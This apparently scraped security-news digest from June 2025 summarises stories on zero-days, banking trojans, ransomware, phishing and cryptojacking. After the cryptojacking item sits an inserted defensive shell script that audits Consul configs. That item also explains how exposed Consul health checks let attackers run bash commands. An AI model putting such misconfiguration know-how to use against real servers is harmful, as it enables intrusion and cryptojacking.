exploits ransomware
2025-06-05 https://www.bleepingcomputer.com/news/security/how-to-build-a-robust-windows-service-to-block-malware-and-ransomware/
Designing a security-focused Windows Service? Learn more from ThreatLocker about the core components for real-time monitoring, threat detection, and system hardening to defend against malware and ransomware. [...]

Autosummary: Key Design Principles for Security Services: When designing a security-focused Windows Service, several principles are essential to ensure effectiveness and reliability. Minimal Attack Surface: Design the service with the least privilege principle, granting it only the permissions necessary to perform its tasks.
Architectural Overview of a Robust Security Service: A robust security service typically comprises several components working together. Monitoring Engine: Continuously observes system activities such as process execution, file access, and network connections.
Process and File System Monitoring: This component focuses on monitoring the system’s processes and file system activities. Process Monitoring: Tracks the creation, modification, and termination of processes.
Network Activity Analysis: Monitoring network activity is essential for identifying potential threats that rely on communication with external servers or other infected devices. Outbound Connections: Watches for unauthorized or unusual outbound connections, which could indicate data exfiltration or communication with a command-and-control server.
By integrating real-time monitoring, process and file system analysis, and network activity monitoring, the Windows Service can provide comprehensive protection against various threats.


MailerLite warns of phishing campaign

financial
2025-06-05 https://grahamcluley.com/mailerlite-warns-of-phishing-campaign/
MailerLite has contacted its customers warning them about a phishing campaign that is trying to steal login details.



TXOne Networks unveils intelligent vulnerability mitigation capability

exploits
2025-06-04 https://www.helpnetsecurity.com/2025/06/04/txone-networks-unveils-intelligent-vulnerability-mitigation-capability/

TXOne Networks announced an expanded new version of its SageOne OT Cybersecurity Governance Platform. Already relied upon by many industrial leaders across sectors with exacting cybersecurity requirements, TXOne SageOne has been enhanced to deliver a novel capability for intelligent vulnerability mitigation. One of the most common challenges faced by operational technology (OT) cybersecurity practitioners is how to patch effectively under time constraints, making risk-based prioritization essential. TXOne SageOne integrates external intelligence on emerging threats, the specific … More


Autosummary: The TXOne Networks solution implements a rigorous, three-phase approach to risk-based vulnerability management. Assess: TXOne SageOne pulls deep, OS-level vulnerability and configuration data, augmented by real-time threat intelligence, to build an accurate, context-rich view of every CPS asset’s true risk exposure.


HPE Issues Security Patch for StoreOnce Bug Allowing Remote Authentication Bypass

exploits
2025-06-04 https://thehackernews.com/2025/06/hpe-issues-security-patch-for-storeonce.html
Hewlett Packard Enterprise (HPE) has released security updates to address as many as eight vulnerabilities in its StoreOnce data backup and deduplication solution that could result in an authentication bypass and remote code execution. "These vulnerabilities could be remotely exploited to allow remote code execution, disclosure of information, server-side request forgery, authentication bypass,

Autosummary: "


Cartier disclosed a data breach following a cyber attack

financial
2025-06-04 https://securityaffairs.com/178601/data-breach/cartier-disclosed-a-data-breach-following-a-cyber-attack.html
Luxury-goods conglomerate Cartier disclosed a data breach that exposed customer information after a cyberattack. Cartier has disclosed a data breach following a cyberattack that compromised its systems, exposing customers’ personal information. The incident comes amid a wave of cyberattacks targeting luxury fashion brands. The luxury firm states that the threat actors gained access to “limited […] "

Autosummary: ⚠️ This marks the third cybersecurity incident… pic.twitter.com/k00j8AzmRj — VenariX (@_venarix_) June 3, 2025 Recently, other luxury and fashion brands were victims of cyber attacks, including Adidas, Dior, and Victoria’s Secret. "


Google fixes Chrome zero-day with in-the-wild exploit (CVE-2025-5419)

exploits
2025-06-04 https://www.helpnetsecurity.com/2025/06/04/google-fixes-chrome-zero-day-with-in-the-wild-exploit-cve-2025-5419/

Google has fixed two Chrome vulnerabilities, including a zero-day flaw (CVE-2025-5419) with an in-the-wild exploit. About CVE-2025-5419 CVE-2025-5419 is a high-severity out of bounds read and write vulnerability in V8, the JavaScript and WebAssembly engine developed by Google for the Chromium and Chrome web browsers. It allows remote attackers to trigger heap corruption via a crafted HTML page. It was reported by Clément Lecigne and Benoît Sevens of Google’s Threat Analysis Group – a specialized … More

The post Google fixes Chrome zero-day with in-the-wild exploit (CVE-2025-5419) appeared first on Help Net Security.

"

Autosummary: "


Roundcube Webmail under fire: critical exploit found after a decade

exploits
2025-06-04 https://securityaffairs.com/178615/hacking/roundcube-webmail-under-fire-critical-exploit-found-after-a-decade.html
A critical flaw in Roundcube webmail, undetected for 10 years, allows attackers to take over systems and execute arbitrary code. A critical flaw, tracked as CVE-2025-49113 (CVSS score of 9.9), has been discovered in the Roundcube webmail software. The vulnerability went unnoticed for over a decade; an attacker can exploit the flaw to take control […] "

Autosummary: Roundcube Webmail under fire: critical exploit found after a decade Pierluigi Paganini June 04, 2025 A critical flaw in Roundcube webmail, undetected for 10 years, allows attackers to take over systems and execute arbitrary code. "


U.S. CISA adds Multiple Qualcomm chipsets flaws to its Known Exploited Vulnerabilities catalog

exploits
2025-06-04 https://securityaffairs.com/178610/hacking/u-s-cisa-adds-multiple-qualcomm-chipsets-flaws-to-its-known-exploited-vulnerabilities-catalog.html
U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds multiple Qualcomm chipset flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added multiple Qualcomm chipset flaws to its Known Exploited Vulnerabilities (KEV) catalog. This week, Qualcomm addressed the above zero-day vulnerabilities that, according to the company, have been exploited in limited, […] "

Autosummary: CVE-2025-21479 Qualcomm Multiple Chipsets Incorrect Authorization Vulnerability; CVE-2025-21480 Qualcomm Multiple Chipsets Incorrect Authorization Vulnerability; CVE-2025-27038 Qualcomm Multiple Chipsets Use-After-Free Vulnerability. This week, Qualcomm addressed the above zero-day vulnerabilities that, according to the company, have been exploited in limited, targeted attacks in the wild. "


Indigenous lawyer leads race for chief justice in Mexico

latam
2025-06-04 https://www.bbc.com/news/articles/c14k56dmxx7o
Hugo Aguilar, who has long fought for indigenous rights, looks set to preside over Mexico’s highest court. "

Autosummary: "


FBI warns of NFT airdrop scams targeting Hedera Hashgraph wallets

financial
2025-06-04 https://www.bleepingcomputer.com/news/security/fbi-warns-of-nft-airdrop-scams-targeting-hedera-hashgraph-wallets/
The FBI is warning about a new scam where cybercriminals exploit NFT airdrops on the Hedera Hashgraph network to steal crypto from cryptocurrency wallets. [...] "

Autosummary: During the NFT claiming or minting process, it is crucial never to share passwords, seed phrases, or one-time passwords (OTPs), unless you initiated contact. "


Media giant Lee Enterprises says data breach affects 39,000 people

financial
2025-06-04 https://www.bleepingcomputer.com/news/security/media-giant-lee-enterprises-says-data-breach-affects-39-000-people/
Publishing giant Lee Enterprises is notifying nearly 40,000 people whose personal information was stolen in a February 2025 ransomware attack. [...] "

Autosummary: "


Google fixes another actively exploited vulnerability in Chrome, so update now!

exploits
2025-06-04 https://www.malwarebytes.com/blog/news/2025/06/google-fixes-another-actively-exploited-vulnerability-in-chrome-so-update-now
Google has released an important update for Chrome, patching one actively exploited zero-day and two other security flaws. "

Autosummary: This Chrome update also patches a medium-severity, use-after-free flaw (CVE-2025-5068) in the open-source rendering engine Blink and one internally discovered vulnerability. "


Google Exposes Vishing Group UNC6040 Targeting Salesforce with Fake Data Loader App

financial
2025-06-04 https://thehackernews.com/2025/06/google-exposes-vishing-group-unc6040.html
Google has disclosed details of a financially motivated threat cluster that it said "specialises" in voice phishing (aka vishing) campaigns designed to breach organizations’ Salesforce instances for large-scale data theft and subsequent extortion. The tech giant’s threat intelligence team is tracking the activity under the moniker UNC6040, which it said exhibits characteristics that align with "

Autosummary: "The success of campaigns like UNC6040’s, leveraging these refined vishing tactics, demonstrates that this approach remains an effective threat vector for financially motivated groups seeking to breach organizational defenses," Google said. "


Chaos RAT Malware Targets Windows and Linux via Fake Network Tool Downloads

exploits Linux
2025-06-04 https://thehackernews.com/2025/06/chaos-rat-malware-targets-windows-and.html
Threat hunters are calling attention to a new variant of a remote access trojan (RAT) called Chaos RAT that has been used in recent attacks targeting Windows and Linux systems. According to findings from Acronis, the malware artifact may have been distributed by tricking victims into downloading a network troubleshooting utility for Linux environments. "Chaos RAT is an open-source RAT written in "

Autosummary: Once installed, the malware connects to an external server and awaits commands that allow it to launch reverse shells, upload/download/delete files, enumerate files and directories, take screenshots, gather system information, lock/restart/shutdown the machine, and open arbitrary URLs. "


Microsoft unveils free EU cybersecurity program for governments

government ciber
2025-06-04 https://www.bleepingcomputer.com/news/microsoft/microsoft-unveils-free-eu-cybersecurity-program-for-governments/
Microsoft announced in Berlin today a new European Security Program that promises to bolster cybersecurity for European governments. [...] "

Autosummary: "


FBI: Play ransomware breached 900 victims, including critical orgs

exploits ransomware
2025-06-04 https://www.bleepingcomputer.com/news/security/fbi-play-ransomware-breached-900-victims-including-critical-orgs/
In an update to a joint advisory with CISA and the Australian Cyber Security Centre, the FBI said that the Play ransomware gang had breached roughly 900 organizations as of May 2025, three times the number of victims reported in October 2023. [...] "

Autosummary: Previous high-profile Play ransomware victims include cloud computing company Rackspace, the City of Oakland in California, Dallas County, car retailer giant Arnold Clark, the Belgian city of Antwerp, and, more recently, doughnut chain Krispy Kreme and American semiconductor supplier Microchip Technology. "


Cisco warns of ISE and CCP flaws with public exploit code

exploits
2025-06-04 https://www.bleepingcomputer.com/news/security/cisco-warns-of-ise-and-ccp-flaws-with-public-exploit-code/
Cisco has released patches to address three vulnerabilities with public exploit code in its Identity Services Engine (ISE) and Customer Collaboration Platform (CCP) solutions. [...] "

Autosummary: "A vulnerability in Amazon Web Services (AWS), Microsoft Azure, and Oracle Cloud Infrastructure (OCI) cloud deployments of Cisco Identity Services Engine (ISE) could allow an unauthenticated, remote attacker to access sensitive data, execute limited administrative operations, modify system configurations, or disrupt services within the impacted systems," the company explained. "


Cybersecurity jobs available right now: June 3, 2025

ciber
2025-06-03 https://www.helpnetsecurity.com/2025/06/03/cybersecurity-jobs-available-right-now-june-3-2025/

The post Cybersecurity jobs available right now: June 3, 2025 appeared first on Help Net Security.

"

Autosummary: Manager, IT Operations (Cloud, Security and Infrastructure) GMS Health Insurance | Canada | On-site – View job details As a Manager, IT Operations (Cloud, Security and Infrastructure), you will negotiate SLAs, review performance dashboards, maintain the security risk register, and coordinate remediation across IT, architecture, and business units. Engineer, Network Security Concentra | USA | On-site – View job details As an Engineer, Network Security, you will be responsible for planning, designing, developing, evaluating, testing, and integrating the organization’s security infrastructure, including the implementation and design of multiple security solutions. Senior Security Engineer, Application Security Constantinople | Australia | Hybrid – View job details As a Senior Security Engineer, Application Security, you will enhance and manage application security tooling such as SAST, DAST (both out-of-the-box and custom), open-source vulnerability scanning, and EASM. Information Security Officer Medison Pharma | Israel | On-site – View job details As an Information Security Officer, you will be responsible for developing, updating, and maintaining the organizational information security management framework, including policies, procedures, and work plans. Senior Network Security Engineer Elavon | Ireland | Hybrid – View job details As a Senior Network Security Engineer, you will be primarily responsible for implementing and supporting security solutions and technologies to help protect the organization’s systems from unauthorized access, use, disclosure, destruction, modification, or disruption. "


New Chrome Zero-Day Actively Exploited; Google Issues Emergency Out-of-Band Patch

exploits
2025-06-03 https://thehackernews.com/2025/06/new-chrome-zero-day-actively-exploited.html
Google on Monday released out-of-band fixes to address three security issues in its Chrome browser, including one that it said has come under active exploitation in the wild. The high-severity flaw is being tracked as CVE-2025-5419, and has been flagged as an out-of-bounds read and write vulnerability in the V8 JavaScript and WebAssembly engine. "Out of bounds read and write in V8 in Google "

Autosummary: "


How global collaboration is hitting cybercriminals where it hurts

ciber
2025-06-03 https://www.helpnetsecurity.com/2025/06/03/william-lyne-national-crime-agency-cybercrime-ecosystem-threats/

In this Help Net Security interview, William Lyne, Deputy Director of UK’s National Crime Agency, discusses the cybercrime ecosystem and the threats it enables. He explains how cybercrime is becoming more accessible and fragmented. Lyne also talks about key trends, recent disruptions, and collaboration between law enforcement and the private sector. What are the most concerning trends you’re seeing in cybercriminal behaviour today? Cybercrime is a constantly evolving threat, which is supported and enabled by … More

The post How global collaboration is hitting cybercriminals where it hurts appeared first on Help Net Security.

"

Autosummary: I cannot comment on specific, ongoing investigations, but generally we see groups like these as comprised of individuals, often young men, in English-speaking countries who often have particular social engineering skills – exploiting people within organisations as opposed to using technical means to gain access to victim systems. Again in 2024, the NCA led Op DESTABILISE, which successfully disrupted Russian-speaking illicit finance networks that we know were utilised by a number of different ransomware groups, alongside a range of other threat actors. "


Bankers Association’s attack on cybersecurity transparency

financial ciber
2025-06-03 https://www.helpnetsecurity.com/2025/06/03/bankers-association-attack-on-cybersecurity-transparency/

A coalition of banking industry associations, including SIFA, the American Bankers Association (ABA), Bank Policy Institute (BPI), and several other lobbying groups have made a disgraceful appeal to the SEC to eliminate the rule requiring public disclosure of material cybersecurity incidents within four days of detection. This rule was established to ensure shareholders are properly informed and potential victims receive timely notice so they can take protective action, which wasn’t happening consistently before the rule … More

The post Bankers Association’s attack on cybersecurity transparency appeared first on Help Net Security.

"

Autosummary: A coalition of banking industry associations, including SIFA, the American Bankers Association (ABA), Bank Policy Institute (BPI), and several other lobbying groups have made a disgraceful appeal to the SEC to eliminate the rule requiring public disclosure of material cybersecurity incidents within four days of detection. Business leaders and cybersecurity professionals should see this for what it is: a shady move to protect image and profits at the expense of transparency, fairness, security, and public trust. They’re putting forward weak, recycled arguments in the hopes of shielding their industry from public scrutiny, narrative damage, and financial consequences. "


Google patches new Chrome zero-day bug exploited in attacks

exploits
2025-06-03 https://www.bleepingcomputer.com/news/security/google-patches-new-chrome-zero-day-bug-exploited-in-attacks/
Google has released an emergency security update to fix the third Chrome zero-day vulnerability exploited in attacks since the start of the year. [...] "

Autosummary: "


Android malware Crocodilus adds fake contacts to spoof trusted callers

exploits
2025-06-03 https://www.bleepingcomputer.com/news/security/android-malware-crocodilus-adds-fake-contacts-to-spoof-trusted-callers/
The latest version of the "Crocodilus" Android malware has introduced a new mechanism that adds a fake contact on the infected device’s contact list to deceive victims. [...] "

Autosummary: JS snippet to create a new contact on the device (Source: Threat Fabric). "Upon receiving the command "TRU9MMRHBCRO", Crocodilus adds a specified contact to the victim’s contact list," explains Threat Fabric in the report. "


Scammers are impersonating Interactive Brokers: Here’s what you need to know

financial
2025-06-03 https://www.helpnetsecurity.com/2025/06/03/ibkr-interactive-brokers-scams/

Interactive Brokers is warning customers to be on high alert due to a wave of scams involving fraudsters posing as company representatives. Interactive Brokers (IBKR) is a global brokerage firm that lets investors trade stocks, options, futures, and other assets on international markets. In a message sent to clients on June 2, the company said it is seeing more cases of criminals impersonating its employees, branding, and email addresses in order to trick people into … More

The post Scammers are impersonating Interactive Brokers: Here’s what you need to know appeared first on Help Net Security.

"

Autosummary: How to protect yourself: never share your login credentials; use multi-factor authentication on your account; be cautious of messages that create urgency; always verify who you are dealing with; report any suspicious activity to your local police or regulator. If you are ever unsure whether a message is really from IBKR, contact their Client Services team directly through the company’s website. "


Scattered Spider: Understanding Help Desk Scams and How to Defend Your Organization

financial
2025-06-03 https://thehackernews.com/2025/06/scattered-spider-understanding-help.html
In the wake of high-profile attacks on UK retailers Marks & Spencer and Co-op, Scattered Spider has been all over the media, with coverage spilling over into the mainstream news due to the severity of the disruption caused — currently looking like hundreds of millions in lost profits for M&S alone. This coverage is extremely valuable for the cybersecurity community as it raises "

Autosummary: So, for example, having a process for MFA reset that recognizes the risk associated with resetting a high-privileged account: require multi-party approval/escalation for admin-level account resets; require in-person verification if the process can’t be followed remotely; freeze self-service resets when suspicious behavior is encountered (this would require some kind of internal process and awareness training to raise the alarm if an attack is suspected). And watch out for these gotchas: if you receive a call, good practice is to terminate the call and dial the number on file for the employee. After MGM refused to pay, the attack eventually resulted in a 36-hour outage, a $100m hit, and a class-action lawsuit settled for $45m. in September 2023, where the hacker used LinkedIn information to impersonate an employee and reset the employee’s credentials, resulting in a 6TB data theft. Social engineering domain registrars to take control of the target organization’s DNS, hijacking their MX records and inbound mail, and using this to take over the company’s business app environments. And latterly, using MFA-bypass AiTM phishing kits like Evilginx to steal live user sessions, bypassing all common forms of MFA (with the exception of WebAuthn/FIDO2). Scattered Spider phishing pages running Evilginx. "


Android Trojan Crocodilus Now Active in 8 Countries, Targeting Banks and Crypto Wallets

financial exploits
2025-06-03 https://thehackernews.com/2025/06/android-trojan-crocodilus-now-active-in.html
A growing number of malicious campaigns have leveraged a recently discovered Android banking trojan called Crocodilus to target users in Europe and South America. The malware, according to a new report published by ThreatFabric, has also adopted improved obfuscation techniques to hinder analysis and detection, and includes the ability to create new contacts in the victim’s contacts list. "Recent "

Autosummary: The malware, according to a new report published by ThreatFabric, has also adopted improved obfuscation techniques to hinder analysis and detection, and includes the ability to create new contacts in the victim’s contacts list. "


Google fixed the second actively exploited Chrome zero-day since the start of the year

exploits
2025-06-03 https://securityaffairs.com/178560/hacking/google-fixed-the-second-actively-exploited-chrome-zero-day-since-the-start-of-the-year.html
Google addressed three vulnerabilities in its Chrome browser, including one that is actively exploited in attacks in the wild. Google released out-of-band updates to address three vulnerabilities in its Chrome browser, including one, tracked as CVE-2025-5419, that is actively exploited in the wild. The vulnerability is an out-of-bounds read and write in the V8 JavaScript […] "

Autosummary: Google fixed the second actively exploited Chrome zero-day since the start of the year Pierluigi Paganini June 03, 2025 Google addressed three vulnerabilities in its Chrome browser, including one that is actively exploited in attacks in the wild. "


CISA warns of ConnectWise ScreenConnect bug exploited in attacks

exploits
2025-06-03 https://www.bleepingcomputer.com/news/security/cisa-warns-of-connectwise-screenconnect-bug-exploited-in-attacks/
CISA is alerting federal agencies in the U.S. of hackers exploiting a recently patched ScreenConnect vulnerability that could lead to executing remote code on the server. [...] "

Autosummary: "


Scammers are constantly changing the game, but so are we. Introducing Malwarebytes Scam Guard

financial exploits
2025-06-03 https://www.malwarebytes.com/blog/product/2025/06/scammers-are-constantly-changing-the-game-but-so-are-we-introducing-malwarebytes-scam-guard
As scammers develop new ways of exploiting unsuspecting users, Malwarebytes is introducing Scam Guard to combat this new wave of threats. "

Autosummary: Comprehensive scam detection: Scam Guard is trained to recognize various scams, including romance, phishing, financial fraud, text, robocall, and shipping fraud, helping you stay ahead of cybercriminals at all times. "


Malwarebytes Scam Guard spots and avoids potential scams

financial exploits
2025-06-03 https://www.helpnetsecurity.com/2025/06/03/malwarebytes-scam-guard/

Malwarebytes launched Scam Guard, an AI-powered digital safety companion that provides real-time feedback on scams, threats and malware alongside digital safety recommendations. Whether it’s a suspicious text, DM, email, image or link, Scam Guard offers judgment-free, personalized advice to help users spot and avoid potential scams. Embedded within the Malwarebytes Mobile Security app, the new feature aims to remove the stigma of shame around scams by helping educate and guide users before it’s too late. … More

The post Malwarebytes Scam Guard spots and avoids potential scams appeared first on Help Net Security.

"

Autosummary: Scam Guard is trained to recognize various scams, including romance, phishing, financial fraud, text, robocall and shipping fraud, helping users stay ahead of cybercriminals at all times. "


Critical 10-Year-Old Roundcube Webmail Bug Allows Authenticated Users Run Malicious Code

exploits
2025-06-03 https://thehackernews.com/2025/06/critical-10-year-old-roundcube-webmail.html
Cybersecurity researchers have disclosed details of a critical security flaw in the Roundcube webmail software that has gone unnoticed for a decade and could be exploited to take over susceptible systems and execute arbitrary code. The vulnerability, tracked as CVE-2025-49113, carries a CVSS score of 9.9 out of 10.0. It has been described as a case of post-authenticated remote code execution via "

Autosummary: "


Android banking trojan Crocodilus rapidly evolves and goes global

financial exploits
2025-06-03 https://securityaffairs.com/178578/malware/android-banking-trojan-crocodilus-evolves-fast-and-goes-global.html
A new Android banking trojan called Crocodilus is being used in a growing number of campaigns targeting users in Europe and South America. Crocodilus is a recently discovered Android banking trojan that is quickly gaining ground. What began as small test campaigns has now grown into full-blown attacks targeting users across Europe and South America. […] "

Autosummary: Meanwhile, smaller campaigns show a broader, global focus, impersonating apps from countries like Argentina, Brazil, the U.S., Indonesia, and India. "


U.S. CISA adds ASUS RT-AX55 devices, Craft CMS, and ConnectWise ScreenConnect flaws to its Known Exploited Vulnerabilities catalog

exploits
2025-06-03 https://securityaffairs.com/178591/hacking/u-s-cisa-adds-asus-rt-ax55-devices-craft-cms-and-connectwise-screenconnect-flaws-to-its-known-exploited-vulnerabilities-catalog.html
U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds ASUS RT-AX55 devices, Craft CMS, and ConnectWise ScreenConnect flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added ASUS RT-AX55 devices, Craft CMS, and ConnectWise ScreenConnect flaws to its Known Exploited Vulnerabilities (KEV) catalog. Below are the descriptions for these flaws: Last […] "

Autosummary: Below are the descriptions for these flaws: CVE-2021-32030 ASUS Routers Improper Authentication Vulnerability; CVE-2023-39780 ASUS RT-AX55 Routers OS Command Injection Vulnerability; CVE-2024-56145 Craft CMS Code Injection Vulnerability; CVE-2025-3935 ConnectWise ScreenConnect Improper Authentication Vulnerability; CVE-2025-35939 Craft CMS External Control of Assumed-Immutable Web Parameter Vulnerability. Last week, ConnectWise revealed it had detected suspicious activity linked to an advanced nation-state actor. "


British journalist missing in Brazil found safe

latam
2025-06-03 https://www.bbc.com/news/articles/cvgvlpd5j8do
Charlotte Alice Peet, 32, was reported missing to authorities by her UK-based family after losing contact with her. "

Autosummary: "


A cyberattack hit hospitals operated by Covenant Health

ciber
2025-06-02 https://securityaffairs.com/178507/uncategorized/a-cyberattack-hit-hospitals-operated-by-covenant-health.html
A cyberattack hit three hospitals operated by Covenant Health, forcing them to shut down all systems to contain the incident. Three hospitals run by Covenant Health were hit by a cyberattack, prompting them to shut down all their systems to contain the security incident. “St. Mary’s is currently experiencing a temporary system issue that is […] "

Autosummary: A cyberattack hit hospitals operated by Covenant Health Pierluigi Paganini June 02, 2025 A cyberattack hit three hospitals operated by Covenant Health, forcing them to shut down all systems to contain the incident. "


The AI copyright standoff continues - with no solution in sight

ransomware government
2025-06-02 https://www.bbc.com/news/articles/clyrgv2n190o
The bitter row over how to protect artists in the artificial intelligence age returns to the Lords. "

Autosummary: She says ministers would be "knowingly throwing UK designers, artists, authors, musicians, media and nascent AI companies under the bus" if they don’t move to protect their output from what she describes as "state sanctioned theft" from a UK industry worth £124bn. Sir Nick Clegg, former president of global affairs at Meta, is among those broadly supportive of the bill, arguing that asking permission from all copyright holders would "kill the AI industry in this country". "


Qualcomm fixes three Adreno GPU zero-days exploited in attacks

exploits
2025-06-02 https://www.bleepingcomputer.com/news/security/qualcomm-fixes-three-adreno-gpu-zero-days-exploited-in-attacks/
Qualcomm has released security patches for three zero-day vulnerabilities in the Adreno Graphics Processing Unit (GPU) driver that impact dozens of chipsets and are actively exploited in targeted attacks. [...] "

Autosummary: "


⚡ Weekly Recap: APT Intrusions, AI Malware, Zero-Click Exploits, Browser Hijacks and More

exploits
2025-06-02 https://thehackernews.com/2025/06/weekly-recap-apt-intrusions-ai-malware.html
If this had been a security drill, someone would’ve said it went too far. But it wasn’t a drill—it was real. The access? Everything looked normal. The tools? Easy to find. The detection? Came too late. This is how attacks happen now—quiet, convincing, and fast. Defenders aren’t just chasing hackers anymore—they’re struggling to trust what their systems are telling them. The problem isn’t too "

Autosummary: This week’s list includes — CVE-2025-3935 (ConnectWise ScreenConnect), CVE-2025-47577 (TI WooCommerce Wishlist plugin), CVE-2025-2760, CVE-2025-2761 (GIMP), CVE-2025-0072 (Arm Mali GPU), CVE-2025-27462, CVE-2025-27463, CVE-2025-27464 (Citrix XenServer VM Tools for Windows), CVE-2025-4793 (PHPGurukul Online Course Registration), CVE-2025-47933 (Argo CD), CVE-2025-46701 (Apache Tomcat CGI servlet), CVE-2025-48057 (Icinga 2), CVE-2025-48827, CVE-2025-48828 (vBulletin), CVE-2025-41438, CVE-2025-46352 (Consilium Safety CS5000 Fire Panel), CVE-2025-1907 (Instantel Micromate), CVE-2025-26383 (Johnson Controls iSTAR Configuration Utility), CVE-2018-1285 (Rockwell Automation FactoryTalk Historian ThingWorx), CVE-2025-26147 (Denodo Scheduler), CVE-2025-24916, and CVE-2025-24917 (Tenable Network Monitor). According to Dawn, among those arrested included Rameez Shahzad (aka Saim Raza), the alleged ringleader of the criminal enterprise, as well as Muhammad Aslam (Rameez’s father), Atif Hussain, Muhammad Umar Irshad, Yasir Ali, Syed Saim Ali Shah, Muhammad Nowsherwan, Burhanul Haq, Adnan Munawar, Abdul Moiz, Hussnain Haider, Bilal Ahmad, Dilbar Hussain, Muhammad Adeel Akram, Awais Rasool, Usama Farooq, Usama Mehmood and Hamad Nawaz. The hacking group, which overlaps with REF0657, STAC6451, and CL-STA-0048, makes use of various flaws in internet-exposed servers, including the recently disclosed SAP NetWeaver vulnerability, to obtain initial access, drop web shells, and deploy post-exploitation tools like Cobalt Strike, VShell, and Brute Ratel C4. New versions of the malware have been found to improve upon their data exfiltration and remote-control functionality, in addition to refining its obfuscation methods, adding features, switching between encryption algorithms, shifting targets, setting itself as the default messaging app to harvest one-time passwords (OTPs), and modifying social engineering techniques to boost infection rates. It supports Cobalt Strike, Mythic, and phishing setups across AWS, Azure, and DigitalOcean—handling config generation, provisioning, and teardown through repeatable, secure workflows. Stalkerware Apps Spyzie, Cocospy, and Spyic Go Offline — Three "near-identical but differently branded" stalkerware apps, Cocospy, Spyic, and Spyzie, have gone dark and the websites advertising them have disappeared. Security Flaw in Lovable Allows Access to Sensitive Data — Earlier this year, Lovable, the popular vibe coding app, was found to be susceptible to VibeScamming, enabling anyone to create perfect scam pages, host them, and even set up admin dashboards to track stolen data. "The admins did not provide the security they promised," officials said in a notice, stating they have also confiscated a database containing usernames, email addresses, payment information, and more. UTG-Q-015 Targets Government and Enterprise Websites — A threat actor called UTG-Q-015 has been observed leveraging N-day security flaws (CVE-2021-38647, CVE-2017-9805, and CVE-2017-12611) to infiltrate government and enterprise websites in March 2025, as well as single out blockchain websites and financial institutions using puddle mounting and instant messaging phishing tactics to deliver backdoors and other malicious payloads. Characterized as a pro-Palestinian threat group along the lines of Handala, Cyber Toufan has claimed responsibility for over 100 breaches across sectors including government, defense, finance, and critical infrastructure, OP Innovate said. U.S. Government Employee Arrested for Allegedly Trying to Leak Secrets to Foreign Government — Nathan Vilas Laatsch, a 28-year-old IT specialist employed by the Defense Intelligence Agency (DIA), was arrested on May 29, 2025, for allegedly attempting to transmit national defense information to an officer or agent of a foreign government. New Android Malware GhostSpy Emerges — Cybersecurity researchers have detailed a new Android malware called GhostSpy that enables keylogging, screen capture, background audio and video recording, SMS and call log theft, GPS location tracking, and remote command execution. "


‘Russian Market’ emerges as a go-to shop for stolen credentials

rusia-ucrania
2025-06-02 https://www.bleepingcomputer.com/news/security/russian-market-emerges-as-a-go-to-shop-for-stolen-credentials/
The "Russian Market" cybercrime marketplace has emerged as one of the most popular platforms for buying and selling credentials stolen by information stealer malware. [...] "

Autosummary: Acreed isn't different from a typical info-stealer regarding the information it targets, which includes data stored in Chrome, Firefox, and their various derivatives, including passwords, cookies, cryptocurrency wallets, and credit card details. "


Cryptojacking Campaign Exploits DevOps APIs Using Off-the-Shelf Tools from GitHub

exploits
2025-06-02 https://thehackernews.com/2025/06/cryptojacking-campaign-exploits-devops.html
Cybersecurity researchers have discovered a new cryptojacking campaign that's targeting publicly accessible DevOps web servers such as those associated with Docker, Gitea, and HashiCorp Consul and Nomad to illicitly mine cryptocurrencies. Cloud security firm Wiz, which is tracking the activity under the name JINX-0132, said the attackers are exploiting a wide range of known misconfigurations and "

Autosummary: The Python code, Sysdig said, is designed to download and execute cryptocurrency miners like T-Rex and XMRig, create a systemd service for persistence, and use a Discord webhook for command-and-control (C2). HashiCorp Consul, likewise, could pave the way for arbitrary code execution if the system is not properly configured and permits any user with remote access to the server to register services and define health checks, which in turn can include a bash command that will be executed by the registered agent. "
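The Consul exposure described above (anyone who can reach the agent's HTTP API registers a service whose health check is a shell command the agent then runs, with no ACLs to stop them) can be caught before an attacker does. The script below is an added example and is not part of the Wiz or Sysdig research: it audits a Consul agent configuration for the two settings that matter, `enable_script_checks` (true means remotely registered script checks are accepted; `enable_local_script_checks` limits them to local config files) and the ACL system with `default_policy` set to `deny`. The weak and hardened configs are constructed here for illustration; real ones live under the agent's config directory. Only grep and tr are used so it runs without jq, and the key matching is deliberately simple (it assumes the keys appear as in the samples and that the only `"enabled"` key is the ACL one).

```shell
#!/bin/sh
# Added example: audit Consul agent config for open script-check registration.
# The two config fragments are constructed samples, not taken from any real host.
WEAK_CONFIG='{ "enable_script_checks": true, "acl": { "enabled": false } }'
HARDENED_CONFIG='{ "enable_script_checks": false,
  "enable_local_script_checks": true,
  "acl": { "enabled": true, "default_policy": "deny" } }'

# flatten CONFIG_JSON: strip spaces/newlines so key:value pairs are contiguous.
flatten() {
  printf '%s' "$1" | tr -d ' \n'
}

# consul_script_checks_exposed CONFIG_JSON
# True (exit 0) when enable_script_checks is on, i.e. a service registered
# over the HTTP API may carry a command the agent will execute.
consul_script_checks_exposed() {
  flatten "$1" | grep -q '"enable_script_checks":true'
}

# consul_acl_default_deny CONFIG_JSON
# True (exit 0) when ACLs are enabled and unmatched requests are denied,
# so anonymous callers cannot register services at all.
consul_acl_default_deny() {
  flat=$(flatten "$1")
  printf '%s' "$flat" | grep -q '"enabled":true' &&
    printf '%s' "$flat" | grep -q '"default_policy":"deny"'
}

# consul_config_risk CONFIG_JSON
# Prints EXPOSED (exit 1) when script checks are accepted and ACLs do not
# block anonymous registration; OK (exit 0) otherwise.
consul_config_risk() {
  if consul_script_checks_exposed "$1" && ! consul_acl_default_deny "$1"; then
    echo EXPOSED
    return 1
  fi
  echo OK
  return 0
}

# Stand-alone run: report both constructed samples, or a file given as $1.
if [ -n "${1:-}" ] && [ -r "$1" ]; then
  consul_config_risk "$(cat "$1")"
else
  printf 'weak sample:     '; consul_config_risk "$WEAK_CONFIG" || true
  printf 'hardened sample: '; consul_config_risk "$HARDENED_CONFIG" || true
fi
```

The hardened sample is the shape to aim for: script checks disabled for remote registration (or enabled only for local config via `enable_local_script_checks`), ACLs on with a deny default, and the HTTP API not bound to a public interface in the first place. Pass an agent JSON file as the first argument to audit a real host.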


Qualcomm Fixes 3 Zero-Days Used in Targeted Android Attacks via Adreno GPU

exploits
2025-06-02 https://thehackernews.com/2025/06/qualcomm-fixes-3-zero-days-used-in.html
